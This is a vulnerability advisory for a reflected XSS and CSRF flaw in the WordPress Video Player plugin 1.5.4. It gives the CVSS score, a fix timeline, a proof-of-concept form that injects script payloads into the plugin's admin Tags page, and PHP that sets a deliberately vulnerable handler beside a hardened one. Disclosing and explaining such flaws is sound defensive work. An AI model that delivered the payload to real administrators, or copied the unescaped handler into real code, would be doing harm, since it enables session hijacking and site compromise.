WordPress Video Player 1.5.4, Reflected XSS
The ‘Tags’ section of ‘WordPress Video Player’ under WordPress Administration contains two fields that are vulnerable to a Reflected XSS attack. The values submitted to these fields (‘asc_or_desc’ and ‘order_by’) are written back into the page without being encoded for HTML attribute context, so a value beginning with ‘">’ closes the attribute and injects arbitrary markup and script. There is also no nonce on this page, so the request is not tied to the administrator’s session and the XSS can be delivered via CSRF: an attacker only needs to get a logged-in administrator to submit a crafted form.
Homepage
https://wordpress.org/plugins/player/
CVSS Score
4.3
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 1.5.5.
Proof of Concept
<form action="http://localhost/wp-admin/admin.php?page=Tags_Spider_Video_Player" method="post" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="asc_or_desc" value='"><script>alert(1)</script>'/>
<input type="hidden" name="order_by" value='"><script>alert(2)</script>'/>
<input type="submit" value="Submit"/>
</form>
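The following is an added illustration, not code from the Video Player plugin or from this advisory, showing the defect pattern described above in a minimal stand-in for the ‘Tags’ page, beside a hardened version that would stop both the reflected XSS and the CSRF delivery used by the PoC. The function names, the nonce action ‘spider_tags_sort’, the ‘manage_options’ capability and the set of sortable columns are assumptions; the WordPress API calls (esc_attr, wp_nonce_field, check_admin_referer, wp_unslash, current_user_can) are the real ones.

```php
<?php
// Added illustration (not the plugin's own code). Function names, the nonce
// action and the allowed column list are assumptions for this example.

// VULNERABLE: the posted values are echoed straight back into attribute
// context with no encoding, and nothing ties the request to a nonce. A value
// such as  "><script>alert(1)</script>  (as in the PoC above) closes the
// value="..." attribute and the <input> tag, then injects script.
function tags_page_vulnerable() {
    $asc_or_desc = isset( $_POST['asc_or_desc'] ) ? $_POST['asc_or_desc'] : 'asc';
    $order_by    = isset( $_POST['order_by'] )    ? $_POST['order_by']    : 'id';

    echo '<form method="post">';
    echo '<input type="hidden" name="asc_or_desc" value="' . $asc_or_desc . '" />';
    echo '<input type="hidden" name="order_by" value="' . $order_by . '" />';
    echo '</form>';
}

// HARDENED: capability check, nonce verification (defeats the CSRF delivery),
// strict whitelist validation of the two sort parameters, and esc_attr() on
// output so that even an unexpected value cannot break out of the attribute.
function tags_page_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }

    $asc_or_desc = 'asc';
    $order_by    = 'id';

    if ( isset( $_SERVER['REQUEST_METHOD'] ) && 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        // Dies with a 403 page unless the submitted _wpnonce field was issued
        // for this action to the current user. The PoC form carries no nonce,
        // so it stops here.
        check_admin_referer( 'spider_tags_sort' );

        // WordPress adds slashes to request data; strip them before validating.
        $raw_dir = isset( $_POST['asc_or_desc'] ) ? wp_unslash( $_POST['asc_or_desc'] ) : '';
        $raw_col = isset( $_POST['order_by'] )    ? wp_unslash( $_POST['order_by'] )    : '';

        $asc_or_desc = validate_sort_direction( $raw_dir );
        $order_by    = validate_order_column( $raw_col );
    }

    echo '<form method="post">';
    wp_nonce_field( 'spider_tags_sort' );   // emits the hidden _wpnonce field
    echo '<input type="hidden" name="asc_or_desc" value="' . esc_attr( $asc_or_desc ) . '" />';
    echo '<input type="hidden" name="order_by" value="' . esc_attr( $order_by ) . '" />';
    echo '</form>';
}

// Whitelist: anything other than asc/desc falls back to the default, so the
// reflected value can never be attacker-controlled text.
function validate_sort_direction( $value ) {
    return in_array( $value, array( 'asc', 'desc' ), true ) ? $value : 'asc';
}

// Whitelist of sortable columns (assumed set for this example). Validating
// against a fixed list also keeps the value safe if it is later used in an
// ORDER BY clause, which esc_attr() alone would not do.
function validate_order_column( $value ) {
    $allowed = array( 'id', 'name', 'slug' );
    return in_array( $value, $allowed, true ) ? $value : 'id';
}
```

Two points worth noting when applying this pattern to a real plugin page. Output encoding with esc_attr() is what directly closes the reported XSS, but the whitelist is what makes the two parameters safe for every context they reach, so it belongs in the fix even though the advisory only reports the attribute injection. The nonce check is a separate control: it does not make the output encoding optional, but without it any administrator who visits an attacker's page can still be made to submit the form, which is exactly how the PoC above is meant to be delivered.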
Timeline
- 2015-01-15: Discovered
- 2015-01-15: Vendor notified
- 2015-01-16: Vendor responded
- 2015-01-16: Version 1.5.5 released – issue resolved
- 2015-01-16: CVE Requested
- 2015-02-02: Advisory released